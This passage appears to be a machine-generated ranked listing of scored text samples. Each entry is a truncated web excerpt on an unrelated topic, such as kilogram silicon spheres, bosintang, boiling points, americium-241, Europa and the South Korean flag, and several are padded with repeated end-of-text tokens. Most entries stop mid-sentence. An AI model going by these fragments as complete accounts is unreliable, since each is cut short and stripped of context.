Leibniz-Institut fur Kristallzuchtung in Berlin used to grow a 5kg lump of pure monocrystalline silicon in 2007. + +The Australian Centre for Precision Optics then took samples from this lump and shaped them into quasi-perfect spheres. They then made an x-ray interferometer from the left over silicon to determine its crystal structure. They also measured crystals’ surfaces to see what kind of crud had built up there and would therefore have to be taken into account in the final calculations. (Various copper, nickel and silicon oxides had built up on the surface.) + +Various groups then measured the mass of the spheres by comparing them to the platinum-iridium test kilograms owned by the PTB (Physikalisch-Technische Bundesanstalt) in Germany, the National Metrology Institute of Japan in Tskuba and the Bureau International des Poids et Mesures in France. + +The team then measured the volume of the spheres using optical interferometry. And the isotope content was measured by teams at the University of Warsaw, the Institute of Mineral Resources of the Chinese Academy of Science and Institute for Physics of Microstructures of the Russian Academy of Sciences. + +Finally, the number of +================================================================================ +Rank = 23; Score = 1908736.0 +<|begin_of_text|>Bosintang (boshintang) (보신탕; 補身湯) or gaejangguk (개장국), called dangogiguk (단고기국) in North Korea, is a Korean soup that includes dog meat as its primary ingredient.[1] The soup has been claimed to provide increased virility.[2] The meat is boiled with vegetables such as green onions, perilla leaves, and dandelions, and spices such as Doenjang (된장), Gochujang (고추장), and perilla seed powder.[3] It is seasoned with Agastache rugosa before eating. The dish, one of the most common Korean foods made from dog meat, has a long history in Korean culture, but has in recent years been criticized both inside and outside Korea by people with a food taboo on dog meat. + +History [ edit ] + +The consumption of dog meat can be traced back to antiquity. Dog bones were excavated in a neolithic settlement in Changnyeong (창녕), South Gyeongsang Province. A wall painting in the Goguryeo tombs complex (고구려 고분군; 高句麗 古墳群) in South Hwanghae Province, a UNESCO World Heritage site which dates from 4th century AD, depicts a slaughtered dog in a storehouse (Ahn, 2000).[4] + +Approximately in 1816, Jeong Hak Yu (정학유; 丁學遊), the second son of Jeong Yak-yong (정약용; 丁若鏞), a prominent politician and scholar of Choseon dynasty at the time, wrote a poem called Nongawollyeonga (농가월령가; 農家月令歌). This poem, an important source of Korean folk history, describes what ordinary Korean farmer families did in each month of a year. In the description of August, the poem tells of a married woman visiting her birth parents with boiled dog meat, rice cake, and rice wine, thus showing the popularity of dog meat at the time (Ahn, 2000; Seo, 2002). + +In Dongguk Seshigi (동국세시기; 東國歲時記), a book written by a Korean scholar Hong Suk Mo (홍석모; 洪錫謨) in 1849, contains a recipe of Boshintang including a boiled dog and green +================================================================================ +Rank = 24; Score = 1867776.0 +<|begin_of_text|>This article is about the boiling point of liquids. For other uses, see Boiling point (disambiguation) + +Boiling water + +The boiling point of a substance is the temperature at which the vapor pressure of the liquid equals the pressure surrounding the liquid[1][2] and the liquid changes into a vapor. + +The boiling point of a liquid varies depending upon the surrounding environmental pressure. A liquid in a partial vacuum has a lower boiling point than when that liquid is at atmospheric pressure. A liquid at high pressure has a higher boiling point than when that liquid is at atmospheric pressure. For example, water boils at 100 °C (212 °F) at sea level, but at 93.4 °C (200.1 °F) at 1,905 metres (6,250 ft) [3] altitude. For a given pressure, different liquids will boil at different temperatures. + +The normal boiling point (also called the atmospheric boiling point or the atmospheric pressure boiling point) of a liquid is the special case in which the vapor pressure of the liquid equals the defined atmospheric pressure at sea level, 1 atmosphere.[4][5] At that temperature, the vapor pressure of the liquid becomes sufficient to overcome atmospheric pressure and allow bubbles of vapor to form inside the bulk of the liquid. The standard boiling point has been defined by IUPAC since 1982 as the temperature at which boiling occurs under a pressure of 1 bar.[6] + +The heat of vaporization is the energy required to transform a given quantity (a mol, kg, pound, etc.) of a substance from a liquid into a gas at a given pressure (often atmospheric pressure). + +Liquids may change to a vapor at temperatures below their boiling points through the process of evaporation. Evaporation is a surface phenomenon in which molecules located near the liquid's edge, not contained by enough liquid pressure on that side, escape into the surroundings as vapor. On the other hand, boiling is a process in which molecules anywhere in the liquid escape, resulting in the formation of vapor bubbles within the liquid. + +Saturation temperature and pressure [ edit ] + +Demonstration of the lower boiling point of water at lower pressure, achieved by using a vacuum pump + +A saturated liquid contains as much thermal energy as it can without boiling (or conversely a saturated vapor contains as little thermal energy as it can without condensing). + +Saturation temperature means boiling point. The saturation temperature is the temperature for a corresponding saturation pressure at which a liquid boils into its vapor phase. The liquid can be said +================================================================================ +Rank = 25; Score = 1859584.0 +<|begin_of_text|>Δραματικά είναι τα στοιχεία για την κατάσταση στην αγορά εργασίας στην χώρας μας με τους άνεργους συμπολίτες μας να αυξάνονται ημέρα με την ημέρα. Τα άτομα ηλικίας άνω των 15 ετών στην Ελλάδα ανέρχονται σε 9,2 εκατομμύρια. Από αυτούς, τα 4,43 εκατ. δεν εργάζονται καθώς ανήκουν στο «μη εργατικό δυναμικό» της χώρας. Στο εργατικό δυναμικό ανήκουν 4,772 εκατ. άτομα, εκ των οποίων εργάζονται 3,648 εκατ., ενώ τα υπόλοιπα 1,124 εκατ. είναι οι άνεργοι.Αν από τους εργαζόμενους αφαιρεθούν και οι περίπου 375 χιλ. που απασχολούνται με μερική απασχόληση -και ως εκ τούτου έχουν καθαρές αμοιβές της τάξεως των 300-400 ευρώ μηνιαίως- τότε μένουν 3,27 εκατ. πολίτες με πλήρη απασχόληση για να συντηρήσουν τους εαυτούς τους, αλλά και τον υπόλοιπο πληθυσμό της χώρας.Έτσι σύμφωνα με την ανάλυση των στοιχείων που πραγματοποίησε η εφημερίδα «Ναυτεμπορική», στην πραγματικότητα, κάθε εργαζόμενος με πλήρη απασχόληση πρέπει να συντηρήσει τρία άτομα, είτε πρόκειται για παιδιά κάτω των 15 ετών είτε για συμπολίτες του που έχουν βρεθεί εκτός αγοράς εργασίας, είτε για συνταξιούχους.Η ποιοτική ανάλυση των δεδομένων που ανακοινώνει η ΕΛΣΤΑΤ για την ανεργία και την απασχόληση αποκαλύπτει το μέγεθος του προβλήματος στην αγορά εργασίας. Ουσιαστικά, το 60% του πληθυσμού της χώρας άνω των 15 ετών δεν εργάζεται και επιβιώνει είτε με τη σύνταξη είτε με τα όποια επιδόματα χορηγεί +================================================================================ +Rank = 26; Score = 1818624.0 +<|begin_of_text|>We admit it, denim isn't the obvious choice for cycling. However, if you're anything like us, your time out of the saddle is seen through "denim-goggles." Not surprisingly, Levi's observed our daily style and forced the question on us, why not wear denim on your commutes? And with its new Commuter Trucker Jacket, we find ourselves asking the same question. Why not? This isn't some run-of-the-mill, one-off attempt at appeasing a subculture. Instead, Levi's worked closely with cyclists in multiple cities around America, distributing prototypes and accepting feedback. And, as a result of developing the jacket in accordance to critique, Levi's effectively dialed-in the fit, accoutrement, and finishes to what cyclists are actually asking for. Accordingly, Levi's adapted its staple denim jacket to the purpose of cycling. The Commuter Trucker features a water-resistant and dirt-repellent NanoSphere protective finish to make commuting in hostile weather a little more acceptable, especially if your destination is the office. It's for this very reason that Levi's also incorporated an odor-resistant Sanitized finish to the jacket, too. So, clever compositions aside, Levi's also gave the Trucker a cycling-specific cut. What does this mean? To start, the rear hem has been elongated in order to provide additional coverage while you're stretched out over the bars. Additionally, the arms have been lengthened for the same reason. Levi's has also created the pattern of the Trucker on a slight contour with built-in stretch panels running parallel with the torso. You'll also find specific features for cycling like a large flapped-vent across the back panel. Additionally, the elongated tail is capable of being moved up and out of the way with button closures. Furthermore, you're also able to let in or let out the waist hem with button closures. For storage on your rides, the Trucker features a large rear cargo pocket, two buttoned chest pockets, and two hand pockets. And to increa...<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 27; Score = 1810432.0 +<|begin_of_text|>Blaming nature for the CO2 rise doesn't add up + +Posted on 14 August 2011 by MarkR + +Recently there’s been a resurgence in claims that CO 2 rise is caused by 'natural' temperature rise rather than humans. Various arguments are used to make this sound sensible (see Paolo Soares, Murry Salby and Joe Bastardi), but they’re wrong. + +I’m going to pick on just one of the claims Joe Bastardi made in a comment at Tamino’s blog and this is written as an explanation to Joe of why I’m convinced he’s wrong. I hope readers will be able to point out if I’ve made a mistake and work out which argument you think makes the most sense. Bastardi claims that: + +“The answer is obvious. it is the earths temperature which is driving the co2 release into the atmosphere.” + +I’m going to start with chemistry; most carbon in the atmosphere is in CO2 and it can move between the atmosphere and land/oceans through chemical reactions. Billions of tons of carbon don't magically turn into pixie dust. + +Next some maths: if I have one ton of carbon and I add another ton of carbon then I have two. We can write this down as an equation for the change in atmospheric CO 2 over a year, ΔC atm : + +This says that if I ‘emit’ a ton of carbon by, say, triggering a volcano then the atmosphere will gain a ton. If I ‘absorb’ a ton of carbon by growing a tree, then the atmosphere loses a ton. + +We can expand the equation by counting human emissions (HE) and absorption (HA) and natural emissions (NE) and absorption (NA) separately. + +This works because carbon is additive. If a volcano emits a ton of carbon and a factory emits a ton then the atmosphere has gained two tons. This is a very simple balance sheet for the carbon cycle and fortunately there are ‘accountants’ who’ve measured some of these values for us. + +Recently the amount of CO2 in the atmosphere has been rising at ~2 parts per million per year, or around 15 billion tons/year. Meanwhile human emissions excluding land use change (like clearing or planting forests) are 30 billion tons per year. In billions of tons per year we have: + +We can rearrange this: + +Humans are also clearing rainforests and changing land use, but here I'll assume that human effects on absorption (HA) are not much different from zero, i.e. + +So Natural Absorption ( +================================================================================ +Rank = 28; Score = 1802240.0 +<|begin_of_text|>The researchers published their results in the coming issue of the scientific journal Physical Review Letters. + +\”Attempts to calculate the Hoyle state have been unsuccessful since 1954,\” said Professor Dr. Ulf-G. Meißner (Helmholtz-Institut für Strahlen- und Kernphysik der Universität Bonn). \”But now, we have done it!\” The Hoyle state is an energy-rich form of the carbon nucleus. It is the mountain pass over which all roads from one valley to the next lead: From the three nuclei of helium gas to the much larger carbon nucleus. This fusion reaction takes place in the hot interior of heavy stars. If the Hoyle state did not exist, only very little carbon or other higher elements such as oxygen, nitrogen and iron could have formed. Without this type of carbon nucleus, life probably also would not have been possible. + +The search for the \”slave transmitter\” + +The Hoyle state had been verified by experiments as early as 1954, but calculating it always failed. For this form of carbon consists of only three, very loosely linked helium nuclei – more of a cloudy diffuse carbon nucleus. And it does not occur individually, only together with other forms of carbon. \”This is as if you wanted to analyze a radio signal whose main transmitter and several slave transmitters are interfering with each other,\” explained Prof. Dr. Evgeny Epelbaum (Institute of Theoretical Physics II at Ruhr-Universität Bochum). The main transmitter is the stable carbon nucleus from which humans – among others – are made. \”But we are interested in one of the unstable, energy-rich carbon nuclei; so we have to separate the weaker radio transmitter somehow from the dominant signal by means of a noise filter.\” + +What made this possible was a new, improved calculating approach the researchers used that allowed calculating the forces between several nuclear particles more precisely than ever. And in JUGENE, the supercomputer at Forschungszentrum Jülich, a suitable tool was found. It took JUGENE almost a week of calculating. The results matched the experimental data so well that the researchers can be certain that they have indeed calculated the Hoyle state. + +More about how the Universe came into existence + +\”Now we can analyze this exciting and essential form of the carbon nucleus in every detail,\” explained Prof. Meißner. \”We will determine how big it is, and what its structure is. And it also +================================================================================ +Rank = 29; Score = 1802240.0 +<|begin_of_text|>The final frontier smells a lot like a Nascar race—a bouquet of hot metal, diesel fumes and barbecue. The source? Dying stars, mostly. + +The by-products of all this rampant combustion are smelly compounds called polycyclic aromatic hydrocarbons. These molecules "seem to be all over the universe," says Louis Allamandola, the founder and director of the Astrophysics and Astrochemistry Lab at NASA Ames Research Center. "And they float around forever," appearing in comets, meteors and space dust. These hydrocarbons have even been shortlisted for the basis of the earliest forms of life on Earth. Not surprisingly, polycyclic aromatic hydrocarbons can be found in coal, oil and even food. + +Though a pure, unadulterated whiff of outer space is impossible for humans (it's a vacuum after all; we would die if we tried), when astronauts are outside the ISS, space-borne compounds adhere to their suits and hitch a ride back into the station. Astronauts have reported smelling "burned" or "fried" steak after a space walk, and they aren't just dreaming of a home-cooked meal. + +The smell of space is so distinct that, three years ago, NASA reached out to Steven Pearce of the fragrance maker Omega Ingredients to re-create the odor for its training simulations. "Recently we did the smell of the moon," Pearce says. "Astronauts compared it to spent gunpowder." + +Allamandola explains that our solar system is particularly pungent because it is rich in carbon and low in oxygen, and "just like a car, if you starve it of oxygen you start to see black soot and get a foul smell." Oxygen-rich stars, however, have aromas reminiscent of a charcoal grill. Once you leave our galaxy, the smells can get really interesting. In dark pockets of the universe, molecular clouds full of tiny dust particles host a veritable smorgasbord of odors, from wafts of sweet sugar to the rotten-egg stench of sulfur. + +This article originally appeared in the February 2011 issue of Popular Science_ magazine._<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 30; Score = 1785856.0 +<|begin_of_text|>Steven McCloskey, co-founder of a new virtual reality startup, manipulates objects in an immersive environment. + +Virtual reality (VR) headsets such as the Oculus Rift will line store shelves this holiday season, and UC San Diego alumni startup Nanome, Inc. plans to capitalize on that by creating VR apps for the consumer market, the classroom, and beyond. + +Nanome co-founder Steven McCloskey was part of the first graduating class of NanoEngineering at UC San Diego when he received his bachelor’s degree in 2015. Frustrated by the lack of tools available to nanoengineers for complex 3D modeling and simulation at the nanoscale, he set out to try and rectify the problem. He and colleagues built the first molecular visualization, modeling and simulation tool for today’s VR platforms called nano-one. The application allows users to build molecules with carbon, oxygen, nitrogen and hydrogen atoms. + +“Our goal is to provide the tools necessary to help people build new proteins and molecules and eventually also simulate their interactions,” said McCloskey. “You can see how the world works at this fundamental level, and re-make it.” + +Why VR? Everything is made out of atoms—cosmetics, computer hardware, everything. Take a chair, for example. A chair can’t just look like a chair, it has to act like one. If you’re going to be manipulating things in 3D, you also need to be able to change the material properties of an object, which is dictated by structures at the nanoscale level. + +McCloskey said he believes nanoscale virtual reality represents the future of engineering. + +“UC San Diego is where this has to happen—we have a NanoEngineering department, VR experts, Protein Databank, interdisciplinary researchers, and we’re located in Biotech Beach,” he said. + +Nano-one is now being tested in the UC San Diego Chemistry Department and in the consumer market for workflow integration, modeling precision, and optimal pattern-recognition and discovery. + +As nano-one was being developed, McCloskey and his colleagues had an idea for another VR tool that would help engineers with math. + +“When I was in Vector Calculus as a NanoEngineering major, I wanted better 3D graphics to go along with the instruction,” said McCloskey. + +Nanome co-founders Steven McCloskey and Keita Funakawa + +The team piloted a VR 3D-graphing calculator in Math20E over the summer. The calculator, called Calcflow, features intuitive ways for +================================================================================ +Rank = 31; Score = 1728512.0 +<|begin_of_text|>Image copyright Angélica Gonzalez Image caption The plants, pictured here by co-worker Angélica Gonzalez, underpin a whole ecosystem + +It is hard to imagine you could reconstruct a record of fog dating back thousands of years, but this is exactly what Chilean scientists have done. + +The low-lying cloud is seemingly so transient and intangible, and unlike rivers and glaciers it leaves no easy-to-read impressions on the landscape. + +And yet, a Santiago team has been able to trace the fog history of the Atacama Desert by studying Tillandsia plants. + +Their chemistry suggests strongly that this local fog has increased over time. + +It is a period covering the last 3,500 years. + +"I don't think there's any other place in the world where I've actually seen a record of fog, even spanning the last hundred years," said Claudio Latorre Hidalgo from the Catholic University of Chile. + +"What little we know about fog is from measurement instrumental data that we have, and from satellite data that only spans the last 20 years. + +"So, this is actually a unique opportunity to study the evolution of a fog ecosystem over the Late Holocene, and what are the major drivers and controls of the mechanisms that produce that fog in the long term - the very long term." + +The palaeoclimate expert was discussing his team's research here at the Fall Meeting of the American Geophysical Union - the world's largest annual gathering of Earth scientists. + +Media playback is unsupported on your device Media caption Claudio Latorre Hidalgo: "The fog is the plants’ only source of water and nutrients" + +The Atacama is famous for its super-arid conditions; there are places where it has not rained for years. + +But life can eke out an existence if it can exploit the fog that rolls in off the Pacific. Tillandsia are a perfectly adapted opportunist. + +These wiry, grey plants have no roots. They clutch weakly at sand dunes, but arrange themselves at every spatial scale to maximise their capture of the fog. + +They derive everything they need from the damp air - not simply the must-have water, but also all the chemical nutrients required to underpin their biology. + +Dr Latorre Hidalgo and colleagues have dug deep into the dunes to uncover a multi-millennia succession of Tillandsia; and they have described a pronounced trend: the younger the plants, the more of the lighter type, or isotope, of nitrogen atom that they have incorporated into their tissues. + +Image +================================================================================ +Rank = 32; Score = 1712128.0 +<|begin_of_text|>Red Data Girl + +Shy 15-year-old Izumiko Suzuhara has trouble fitting in. Not only was she raised by her grandfather at the local shrine with little exposure to the outside world, but modern communication devices like computers or cell phones strangely crash whenever she touches them. After her childhood acquaintance, the handsome but prickly Miyuki Sagara, suddenly reappears and enrolls in her school, Izumiko learns that she is the last vessel of the goddess Himegami, and Miyuki is forced to serve as her guardian. Although the two of fail to get along at the beginning, their meeting marks the beginning of a shift in Izumiko's destiny. + +Funimation Entertainment announced the dub cast for itshome video release during its Anime Boston panel on Saturday. The cast is as follows:Bryn Apprill as Izumiko SuzuharaMicah Solusod as Miyuki SagaraCaitlin Glass as Hime-gamiJoel McDonald as Manatsu SoudaKristi Kang as Mayura SoudaChris Burnett as Masumi SoudaRyan Reynolds as Satoru WamiyaDavid Matranga as Yukimasa SagaraClifford Chapin as Ichijou TakayanagiDave Trosko as RicardoJason Liebrecht as Hodaka MurakamiLeah Clark as Jean Honoka KisaragiFunimation describes the story: + +A Certain Scientific Railgun S + +Ben-To + +A Certain Scientific Railgun S + +Ben-To + +Toshiya Shinohara (Black Butler, Inuyasha films, The Book of Bantorra) directed this Spring 2013 adaptation of Noriko Ogiwara's novels, and Michiko Yokote (Bleach, Gintama, Princess Tutu) handled the scripts. Minako Shiba (Black Butler,.hack franchise, Noir, Letter Bee) adapted Mel Kishida's original character designs. Musicians myu and Masumi Itou (Bungaku Shōjo) scored the soundtrack.Funimation will release the series on DVD on June 17.The company also announced that it will releaseandon home video.will be released in two sets this summer. Funimation streamed, the sequel to the popular series, last April in the United States. The sequel series followed the Sisters arc from the source material. The Japanese Blu-ray release will include an exclusive brand-new anime titled Daiji na Koto wa Zenbu Sentō ni Osowatta (All the Important Things I Learned +================================================================================ +Rank = 33; Score = 1671168.0 +<|begin_of_text|>/ + +Otomatik kollu bariyer sistemleri endüstriyel alanlarda sıkça kullanılan sistemlerdir. Yabancı araç girişini kontrol eden kollu bariyer sistemi tek ve çift taraflı olarak ta kullanılabilir. Özellikle iş yerleri ve otoparklar için sıkça kullanılan bu otomatik bariyer şeklindeki ürünleri firmalar tercih etmektedirler. Uzaktan kumanda ve kartlı geçiş sistemleri de bulunmaktadır. Araçların büyüklüğüne göre bariyer sistemi de buna göre büyüklükte yapılır. + +Kollu bariyer sistemleri estetik görünümü sağlam yapısı ile kötü hava koşullarında çalışabilmektedir. Yağmurda, karda, fırtınada, aşırı sıcaklarda ve dolu yağmurlarında çalışabilmektedir. Geceleri ise üzerindeki ledler sayesinde kolayca fark edilebilirler. Araç geçtikten sonra bariyer otomatik kapanma sistemi ile zaman ayarlı olarak kapatılabilmektedir. Ayrıca elektrik kesintilerinde otomatik bariyer kolunun manuel kullanımı mekanik olarak ta kullanılabilir. Güvenliğin her şeyden önemli olduğu bilinciyle emniyet fotoseli ve manyetik loop dedektörü bağlantısı mümkün olmaktadır. + +Bariyer sistemleri toplu alanlarda özellikle de çevre düzenleme alanlarında geniş girişlerin sağlanması ve araç kontrollerinin yapılması için yaygın olarak kullanılan bariyer sistemi yoğun kullanımlar için birebirdir. Bariyerlerin üzerindeki fotoseller sayesinde araç geçişi tespit edilip araç geçene kadar bariyer kolunun indirilmesi önlenir. Böylece olası kazalar önlenmiş olur ve kazalara sebebiyet vermez. + +Egebeta otomatik kollu bariyer sistemlerinde rakiplerinden bir adım önde olmayı kendisine ilke edinmiş ve sizlere bu şekilde hizmetler sunmaktadır.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 34; Score = 1662976.0 +<|begin_of_text|>Americium-241 (241Am) is an isotope of americium. Like all isotopes of americium, it is radioactive. 241Am is the most common isotope of americium. It is the most prevalent isotope of americium in nuclear waste. Americium-241 has a half-life of 432.2 years. It is commonly found in ionization type smoke detectors. It is a potential fuel for long-lifetime radioisotope thermoelectric generators (RTGs). Its common parent nuclides are β− from 241Pu, EC from 241Cm and α from 245Bk. 241Am is fissile and the critical mass of a bare sphere is 57.6-75.6 kilograms and a sphere diameter of 19–21 centimeters.[1] Americium-241 has a specific activity of 3.43 Ci/g (curies per gram or 126.9 gigabequerels (GBq) per gram).[2] It is commonly found in the form of americium-241 dioxide (241AmO 2 ). This isotope also has one meta state; 241mAm, with an excitation energy of 2.2 MeV, and a half-life of 1.23 μs. The presence of americium-241 in plutonium is determined by the original concentration of plutonium-241 and the sample age. Because of the low penetration of alpha radiation, americium-241 only poses a health risk when ingested or inhaled. Older samples of plutonium containing plutonium-241 contain a buildup of 241Am. A chemical removal of americium-241 from reworked plutonium (e.g. during reworking of plutonium pits) may be required in some cases. + +Nucleosynthesis [ edit ] + +Americium-241 has been produced in small quantities in nuclear reactors for decades, and many kilograms of 241Am have been accumulated by now.[3] Nevertheless, since it was first offered for sale in 1962, its price, about US$1,500 per gram of 241Am, remains almost unchanged owing to the very complex separation procedure.[4] + +Americium-241 is not synthesized directly from uranium – the most common reactor material – but from the plutonium isotope 239Pu. The latter needs to be produced first, according to the following nuclear process: + +92 238 U → ( n, γ ) 92 239 U → 23.5 m i +================================================================================ +Rank = 35; Score = 1662976.0 +<|begin_of_text|>There may be enough oxygen in the waters of Jupiter's moon Europa to support millions of tons worth of fish, according to a new study. And while nobody is suggesting there might actually be fish on Europa, this finding suggests the Jovian satellite could be capable of supporting the kinds of life familiar to us here on Earth, if only in microbial form. + +Europa, which is roughly the size of Earth's moon, is enveloped by a global ocean about 100 miles deep (160 km), with an icy crust that may be only a few miles thick. From what we know of Earth, where there is water, there is a chance at life, so for many years scientists have speculated that this Jovian moon could support extraterrestrials. + +As we learned more about Jupiter's effect on its moons, the possibility for life on Europa grew even more likely. Studies showed the moon could have enough oxygen to support the kind of life we are most familiar with on Earth. + +IN PICTURES: Jupiter + +The ice on the surface, like all water, is made from hydrogen and oxygen, and the constant stream of radiation pouring in from Jupiter reacts with this ice to form free oxygen and other oxidants such as hydrogen peroxide. The reactivity of oxygen is key to generating the energy that helped multi-cellular life flourish on our planet. + +Still, researchers had thought there was no effective method for delivering any of this oxygen-rich matter into Europa's ocean. Scientists had assumed the primary way for surface materials to migrate downward was from the impacts it would suffer from cosmic debris, which regularly bombards everything in our solar system. [Photos of Jupiter's moons.] + +However, past calculations suggested that even after a few billion years, such "impact gardening" would never lead to an oxygenated layer more than some 33 feet (10 meters) deep into the ice shell, nowhere far enough down to reach the underlying ocean. + +However, the new study suggests this oxygen-rich layer could be far thicker than before thought, potentially encompassing the entire crust. The key is looking at other ways to stir Europa's crust, explained researcher Richard Greenberg, a planetary scientist at the University of Arizona's Lunar and Planetary Laboratory at Tucson. + +The gravitational pull Europa experiences from Jupiter leads to tidal forces roughly 1,000 times stronger than what Earth feels from our moon, flexing and heating Europa and making it very active geologically. This could explain why its surface appears no older than 50 million years old — its surface underwent complete turnover in that time +================================================================================ +Rank = 36; Score = 1622016.0 +<|begin_of_text|>Scientific confirmation that the NASA Mars rover Curiosity has found a location habitable to Martian microbial life 3 billion years ago is an historic milestone in planetary exploration. + +"This is an incredible adventure to get to this point so early in the mission, I feel giddy," said John Grunsfeld NASA associate administrator for science. + +The major finding was made in spite of a weak wisp of organics measured by the rover's instruments, except for a major spike in carbon dioxide from the material when heated to 1,535 deg. F (835 deg. C). + +The signatures of more than five hundred mass values were sampled during the heating of this drilled sample and analyzed by the SAM instrument. Five are shown in the graph. These traces are diagnostic of water, carbon dioxide, oxygen, and two forms of sulfur, sulfur dioxide, the oxidized form, and hydrogen sulfide, the reduced form. The high deuterium-to-hydrogen ratio in water in the Mars atmosphere is a signature of the lighter hydrogen more rapidly escaping to space over geological time. Credit: NASA/ JPL-Caltech/GSFC. + +The new data from the powder drilled from within a rock at Yellowknife Bay indicates that mineralogy, chemistry and abundant fresh water conditions that existed at the time would have supported the existence of prokaryotic organisms. + +Such microbes "do not use organics to metabolize, but rather process inorganic compounds for food and energy", said John Grotzinger of Caltech, project scientist for the Mars Science Laboratory. + +"There does need to be a source of carbon there somewhere," Grotzinger said. "But if it is just carbon dioxide you can have a "Chemolitho autotrophic organism" that literally feeds on rocks. Such organisms will metabolize and generate organic compounds based on carbon in the carbon dioxide," the project scientist said at a Washington briefing on sample results. + +Curiosity's SAM instrument detected the simple carbon-containing compounds chloro- and dichloromethane from the powdered rock sample extracted from the "John Klein" rock on Mars. These species were detected by the gas chromatograph mass spectrometer (GCMS) on Curiosity's Sample Analysis at Mars instrument. The blue peak on the left shows the presence of chloromethane and the two red peaks on the right show the presence of dichloromethane. Credit: NASA/ JPL-Caltech/GSFC + +"The fact that Principal Investigator Paul Mahaffy was able to show in the Sample Analysis at Mars instrument that +================================================================================ +Rank = 37; Score = 1597440.0 +<|begin_of_text|>"Taegukgi" and "Taegeukgi" redirect here. For the 2004 South Korean movie, see Taegukgi (film) + +Republic of Korea Name Taegukgi / Taegeukgi + +(Hangul: 태극기 ) + +(Hanja: 太極旗 Use National flag and ensign Proportion 2:3 Adopted January 27, 1883 (original version, used by the Joseon dynasty) + +June 29, 1942 (Provisional Government of the Republic of Korea) + +October 15, 1949 (as the flag of South Korea) [1] + +May 30, 2011 (current version) Design A white field with a red and blue taegeuk in the center that is surrounded by four varying groups of short black bars toward each corner Variant flag of Republic of Korea Use Naval jack + +The flag of South Korea, also known as the Taegukgi (also spelled as Taegeukgi, literally "supreme ultimate flag"), has three parts: a white rectangular background, a red and blue Taegeuk, symbolizing balance, in its center, and four black trigrams selected from the original eight, one toward each corner. + +Symbolism [ edit ] + +The flag's background is white, a traditional color in Korean culture. White was common in the daily attire of 19th-century Koreans, and it still appears in contemporary versions of traditional Korean garments, such as the hanbok. The color represents peace and purity.[2] + +The circle in the middle is derived from the philosophy of um-yang (yin-yang from China) and represents balance in the universe. The red half represents positive cosmic forces, and the blue half represents the opposing negative cosmic forces. + +Together, the trigrams represent movement and harmony as fundamental principles. Each trigram (hangeul: 괘 [gwae]; hanja: 卦) 